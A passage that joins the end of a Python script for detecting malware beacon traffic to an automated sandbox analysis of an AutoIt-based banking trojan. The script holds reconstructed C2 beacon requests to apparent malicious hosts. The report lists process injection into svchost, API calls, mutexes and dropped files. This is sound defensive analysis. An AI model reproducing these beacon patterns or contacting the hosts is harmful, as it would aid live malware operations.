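    return "\r\n".join(lines) + "\r\n\r\n"


BEACON_HEADERS = ("Cache-Control: no-cache", "Connection: Keep-Alive", "Pragma: no-cache")
REPORT_BEACONS = [  # reconstructed from the two POSTs in the report
    _request("POST", "/hdjf", "pywolwnvd.biz", BEACON_UA, BEACON_HEADERS, ("Content-Length: 802",)),
    _request("POST", "/rai", "ssbzmoy.biz", BEACON_UA, BEACON_HEADERS, ("Content-Length: 802",)),
]
BENIGN_REQUEST = _request(  # constructed ordinary browser request for comparison
    "GET", "/en-us/", "www.microsoft.com",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) "
    "Chrome/131.0.0.0 Safari/537.36")

if __name__ == "__main__":
    for index, hits in scan(REPORT_BEACONS + [BENIGN_REQUEST]).items():
        print(index, *hits, sep="\n  ")
```

The exact User-Agent and the host/path pairs are the high-confidence signals; the shape heuristic on its own will also match some legitimate telemetry uploads, so use it to widen a hunt, not to block.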

          E-Banking Fraud

          Source: Yara match | File source: 4.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 4.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000004.00000002.1792348155.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.1793038630.0000000003950000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

          System Summary

          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe | Code function 0_2_00403B3A: This is a third-party compiled AutoIt script.
          Source: LiuUGJK9vH.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
          Source: LiuUGJK9vH.exe, 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script. (memstr_62348d65-f)
          Source: LiuUGJK9vH.exe, 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer` (memstr_0878ef87-3)
          Source: LiuUGJK9vH.exe | String found in binary or memory: This is a third-party compiled AutoIt script. (memstr_28cd403f-1)
          Source: LiuUGJK9vH.exe | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer` (memstr_c11a1c63-d)
          Source: C:\Windows\SysWOW64\svchost.exe | Code functions calling native (Nt*) APIs:
              4_2_0042CBC3  NtClose
              4_2_03B72B60  NtClose, LdrInitializeThunk
              4_2_03B72DF0  NtQuerySystemInformation, LdrInitializeThunk
              4_2_03B735C0  NtCreateMutant, LdrInitializeThunk
              4_2_03B74340  NtSetContextThread
              4_2_03B74650  NtSuspendThread
              4_2_03B72BA0  NtEnumerateValueKey
              4_2_03B72B80  NtQueryInformationFile
              4_2_03B72BF0  NtAllocateVirtualMemory
              4_2_03B72BE0  NtQueryValueKey
              4_2_03B72AB0  NtWaitForSingleObject
              4_2_03B72AF0  NtWriteFile
              4_2_03B72AD0  NtReadFile
              4_2_03B72FB0  NtResumeThread
              4_2_03B72FA0  NtQuerySection
              4_2_03B72F90  NtProtectVirtualMemory
              4_2_03B72FE0  NtCreateFile
              4_2_03B72F30  NtCreateSection
              4_2_03B72F60  NtCreateProcessEx
              4_2_03B72EA0  NtAdjustPrivilegesToken
              4_2_03B72E80  NtReadVirtualMemory
              4_2_03B72EE0  NtQueueApcThread
              4_2_03B72E30  NtWriteVirtualMemory
              4_2_03B72DB0  NtEnumerateKey
              4_2_03B72DD0  NtDelayExecution
              4_2_03B72D30  NtUnmapViewOfSection
              4_2_03B72D10  NtMapViewOfSection
              4_2_03B72D00  NtSetInformationFile
              4_2_03B72CA0  NtQueryInformationToken
              4_2_03B72CF0  NtOpenProcess
              4_2_03B72CC0  NtQueryVirtualMemory
              4_2_03B72C00  NtQueryInformationProcess
              4_2_03B72C70  NtFreeVirtualMemory
              4_2_03B72C60  NtCreateKey
              4_2_03B73090  NtSetValueKey
              4_2_03B73010  NtOpenDirectoryObject
              4_2_03B739B0  NtGetContextThread
              4_2_03B73D10  NtOpenProcessToken
              4_2_03B73D70  NtOpenThread
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe | Code function 0_2_0046A1EF: GetFullPathNameW, __swprintf, CreateDirectoryW, CreateFileW, _memset, _wcsncpy, DeviceIoControl, CloseHandle, RemoveDirectoryW, CloseHandle
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe | Code function 0_2_00458310: _memset, DuplicateTokenEx, CloseHandle, OpenWindowStationW, GetProcessWindowStation, SetProcessWindowStation, OpenDesktopW, _wcscpy, LoadUserProfileW, CreateEnvironmentBlock, CreateProcessAsUserW, UnloadUserProfile, CloseWindowStation, CloseDesktop, SetProcessWindowStation, CloseHandle, DestroyEnvironmentBlock
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe | Code function 0_2_004651BD: ExitWindowsEx, InitiateSystemShutdownExW, SetSystemPowerState
          Source: C:\Windows\System32\AppVClient.exe | File created: C:\Windows\system32\config\systemprofile\AppData\Roaming\a49546759c90d829.bin
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe | Code functions (no API calls resolved): 0_2_0040E6A0, 0_2_0042D975, 0_2_0040FCE0, 0_2_004221C5, 0_2_004362D2, 0_2_004803DA, 0_2_0043242E, 0_2_004225FA, 0_2_0045E616, 0_2_004166E1, 0_2_0043878F, 0_2_00436844, 0_2_00480857, 0_2_00418808, 0_2_00468889, 0_2_0042CB21, 0_2_00436DB6, 0_2_00416F9E, 0_2_00413030, 0_2_0042F1D9, 0_2_00423187, 0_2_00401287, 0_2_00421484, 0_2_00415520, 0_2_00427696, 0_2_00415760, 0_2_00421978, 0_2_00439AB5, 0_2_0051FCC8, 0_2_00487DDB, 0_2_00421D90, 0_2_0042BDA6, 0_2_0040DF00, 0_2_00413FE0, 0_2_00BA55E8, 0_2_02F900D9, 0_2_02F551EE, 0_2_02F56EAF, 0_2_02F8C7F0, 0_2_02F83780, 0_2_02F8D580, 0_2_02F57B71, 0_2_02F939A3, 0_2_02F85980, 0_2_02F57F80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0040E8554_2_0040E855
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_004010C84_2_004010C8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_004010D04_2_004010D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0042F1D34_2_0042F1D3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_004029F84_2_004029F8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_00402A004_2_00402A00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_004032D04_2_004032D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0041040A4_2_0041040A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_004104134_2_00410413
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_004015004_2_00401500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_00416DA34_2_00416DA3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0040E6434_2_0040E643
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_004106334_2_00410633
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_004026F04_2_004026F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0040E7884_2_0040E788
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0040E7934_2_0040E793
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03C003E64_2_03C003E6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B4E3F04_2_03B4E3F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BFA3524_2_03BFA352
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BC02C04_2_03BC02C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BE02744_2_03BE0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BF41A24_2_03BF41A2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03C001AA4_2_03C001AA
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BF81CC4_2_03BF81CC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BDA1184_2_03BDA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B301004_2_03B30100
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BC81584_2_03BC8158
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BD20004_2_03BD2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B3C7C04_2_03B3C7C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B407704_2_03B40770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B647504_2_03B64750
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B5C6E04_2_03B5C6E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03C005914_2_03C00591
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B405354_2_03B40535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BEE4F64_2_03BEE4F6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BE44204_2_03BE4420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BF24464_2_03BF2446
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BF6BD74_2_03BF6BD7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BFAB404_2_03BFAB40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B3EA804_2_03B3EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B429A04_2_03B429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03C0A9A64_2_03C0A9A6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B569624_2_03B56962
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B268B84_2_03B268B8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B6E8F04_2_03B6E8F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B4A8404_2_03B4A840
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B428404_2_03B42840
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BBEFA04_2_03BBEFA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B4CFE04_2_03B4CFE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B32FC84_2_03B32FC8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B60F304_2_03B60F30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BE2F304_2_03BE2F30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B82F284_2_03B82F28
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BB4F404_2_03BB4F40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B52E904_2_03B52E90
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BFCE934_2_03BFCE93
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BFEEDB4_2_03BFEEDB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BFEE264_2_03BFEE26
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B40E594_2_03B40E59
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B58DBF4_2_03B58DBF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B3ADE04_2_03B3ADE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BDCD1F4_2_03BDCD1F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B4AD004_2_03B4AD00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BE0CB54_2_03BE0CB5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B30CF24_2_03B30CF2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B40C004_2_03B40C00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B8739A4_2_03B8739A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BF132D4_2_03BF132D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B2D34C4_2_03B2D34C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B452A04_2_03B452A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BE12ED4_2_03BE12ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B5B2C04_2_03B5B2C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B4B1B04_2_03B4B1B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03C0B16B4_2_03C0B16B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B2F1724_2_03B2F172
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B7516C4_2_03B7516C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BF70E94_2_03BF70E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BFF0E04_2_03BFF0E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BEF0CC4_2_03BEF0CC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B470C04_2_03B470C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BFF7B04_2_03BFF7B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BF16CC4_2_03BF16CC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B856304_2_03B85630
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03C095C34_2_03C095C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BDD5B04_2_03BDD5B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BF75714_2_03BF7571
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BFF43F4_2_03BFF43F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B314604_2_03B31460
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B5FB804_2_03B5FB80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BB5BF04_2_03BB5BF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B7DBF94_2_03B7DBF9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BFFB764_2_03BFFB76
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BDDAAC4_2_03BDDAAC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B85AA04_2_03B85AA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BE1AA34_2_03BE1AA3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BEDAC64_2_03BEDAC6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BB3A6C4_2_03BB3A6C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BFFA494_2_03BFFA49
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BF7A464_2_03BF7A46
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BD59104_2_03BD5910
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B499504_2_03B49950
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B5B9504_2_03B5B950
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B438E04_2_03B438E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BAD8004_2_03BAD800
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BFFFB14_2_03BFFFB1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B41F924_2_03B41F92
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B03FD24_2_03B03FD2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B03FD54_2_03B03FD5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BFFF094_2_03BFFF09
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B49EB04_2_03B49EB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B5FDC04_2_03B5FDC0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BF7D734_2_03BF7D73
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BF1D5A4_2_03BF1D5A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B43D404_2_03B43D40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BFFCF24_2_03BFFCF2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BB9C324_2_03BB9C32
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe | Code function: String function: 00407DE1 appears 35 times
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe | Code function: String function: 00428900 appears 41 times
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe | Code function: String function: 00420AE3 appears 70 times
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03B75130 appears 58 times
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03BBF290 appears 105 times
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03BAEA12 appears 86 times
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03B2B970 appears 280 times
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03B87E54 appears 111 times
          Source: LiuUGJK9vH.exe, 00000000.00000003.1466548663.00000000041D3000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs LiuUGJK9vH.exe
          Source: LiuUGJK9vH.exe, 00000000.00000003.1459690952.0000000003EF0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamearmsvc.exeN vs LiuUGJK9vH.exe
          Source: LiuUGJK9vH.exe, 00000000.00000003.1478595540.0000000004E9D000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs LiuUGJK9vH.exe
          Source: LiuUGJK9vH.exe, 00000000.00000003.1463774651.0000000003EF0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameALG.exej% vs LiuUGJK9vH.exe
          Source: unknown | Driver loaded: C:\Windows\System32\drivers\AppVStrm.sys
          Source: LiuUGJK9vH.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
          Source: LiuUGJK9vH.exe | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: armsvc.exe.0.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: alg.exe.0.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: AppVClient.exe.0.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: DiagnosticsHub.StandardCollector.Service.exe.0.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: classification engine | Classification label: mal100.spre.troj.evad.winEXE@6/10@2/2
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe | Code function: 0_2_0046A06A GetLastError,FormatMessageW
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe | Code function: 0_2_004581CB AdjustTokenPrivileges,CloseHandle
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe | Code function: 0_2_004587E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe | Code function: 0_2_0046B333 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe | Code function: 0_2_0047EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe | Code function: 0_2_0046C397 CoInitialize,CoCreateInstance,CoUninitialize
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe | Code function: 0_2_00404E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe | Code function: 0_2_02F7CBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe | File created: C:\Users\user\AppData\Roaming\a49546759c90d829.bin
          Source: C:\Windows\System32\AppVClient.exe | Mutant created: \BaseNamedObjects\Global\Multiarch.m0yv-a49546759c90d8299ea72c54-b
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-a49546759c90d8293d78ffaf-b
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-a49546759c90d829-inf
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe | File created: C:\Users\user\AppData\Local\Temp\autC621.tmp
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: LiuUGJK9vH.exe | ReversingLabs: Detection: 91%
          Source: unknown | Process created: C:\Users\user\Desktop\LiuUGJK9vH.exe "C:\Users\user\Desktop\LiuUGJK9vH.exe"
          Source: unknown | Process created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
          Source: unknown | Process created: C:\Windows\System32\alg.exe C:\Windows\System32\alg.exe
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\LiuUGJK9vH.exe"
          Source: unknown | Process created: C:\Windows\System32\AppVClient.exe C:\Windows\system32\AppVClient.exe
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe | Section loaded: wsock32.dll
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe | Section loaded: version.dll
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe | Section loaded: winmm.dll
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe | Section loaded: mpr.dll
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe | Section loaded: wininet.dll
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe | Section loaded: iphlpapi.dll
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe | Section loaded: userenv.dll
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe | Section loaded: uxtheme.dll
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe | Section loaded: winhttp.dll
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe | Section loaded: secur32.dll
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe | Section loaded: sspicli.dll
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe | Section loaded: dnsapi.dll
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe | Section loaded: ntmarta.dll
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe | Section loaded: kernel.appcore.dll
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe | Section loaded: windows.storage.dll
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe | Section loaded: wldp.dll
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe | Section loaded: ondemandconnroutehelper.dll
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe | Section loaded: mswsock.dll
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe | Section loaded: winnsi.dll
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe | Section loaded: dhcpcsvc6.dll
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe | Section loaded: dhcpcsvc.dll
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe | Section loaded: webio.dll
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe | Section loaded: ondemandconnroutehelper.dll
          Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Section loaded: kernel.appcore.dll
          Source: C:\Windows\System32\alg.exe | Section loaded: cryptbase.dll
          Source: C:\Windows\System32\alg.exe | Section loaded: mswsock.dll
          Source: C:\Windows\System32\alg.exe | Section loaded: kernel.appcore.dll
          Source: C:\Windows\System32\AppVClient.exe | Section loaded: appvpolicy.dll
          Source: C:\Windows\System32\AppVClient.exe | Section loaded: userenv.dll
          Source: C:\Windows\System32\AppVClient.exe | Section loaded: wtsapi32.dll
          Source: C:\Windows\System32\AppVClient.exe | Section loaded: netapi32.dll
          Source: C:\Windows\System32\AppVClient.exe | Section loaded: secur32.dll
          Source: C:\Windows\System32\AppVClient.exe | Section loaded: wininet.dll
          Source: C:\Windows\System32\AppVClient.exe | Section loaded: netutils.dll
          Source: C:\Windows\System32\AppVClient.exe | Section loaded: samcli.dll
          Source: C:\Windows\System32\AppVClient.exe | Section loaded: logoncli.dll
          Source: C:\Windows\System32\AppVClient.exe | Section loaded: sspicli.dll
          Source: C:\Windows\System32\AppVClient.exe | Section loaded: winhttp.dll
          Source: C:\Windows\System32\AppVClient.exe | Section loaded: mpr.dll
          Source: C:\Windows\System32\AppVClient.exe | Section loaded: dnsapi.dll
          Source: C:\Windows\System32\AppVClient.exe | Section loaded: iphlpapi.dll
          Source: C:\Windows\System32\AppVClient.exe | Section loaded: ntmarta.dll
          Source: C:\Windows\System32\AppVClient.exe | Section loaded: kernel.appcore.dll
          Source: C:\Windows\System32\AppVClient.exe | Section loaded: appmanagementconfiguration.dll
          Source: C:\Windows\System32\AppVClient.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{52BC3999-6E52-4E8A-87C4-0A2A0CC359B1}\InProcServer32
          Source: LiuUGJK9vH.exe | Static file information: File size 1761792 > 1048576
          Source: LiuUGJK9vH.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb | source: LiuUGJK9vH.exe, 00000000.00000003.1459636308.0000000003EF0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe.0.dr
          Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdb | source: DiagnosticsHub.StandardCollector.Service.exe.0.dr
          Source: Binary string: AppVClient.pdbGCTL | source: AppVClient.exe.0.dr
          Source: Binary string: ALG.pdbGCTL | source: LiuUGJK9vH.exe, 00000000.00000003.1463706750.0000000003EF0000.00000004.00001000.00020000.00000000.sdmp, alg.exe.0.dr
          Source: Binary string: AppVClient.pdb | source: AppVClient.exe.0.dr
          Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdbGCTL | source: DiagnosticsHub.StandardCollector.Service.exe.0.dr
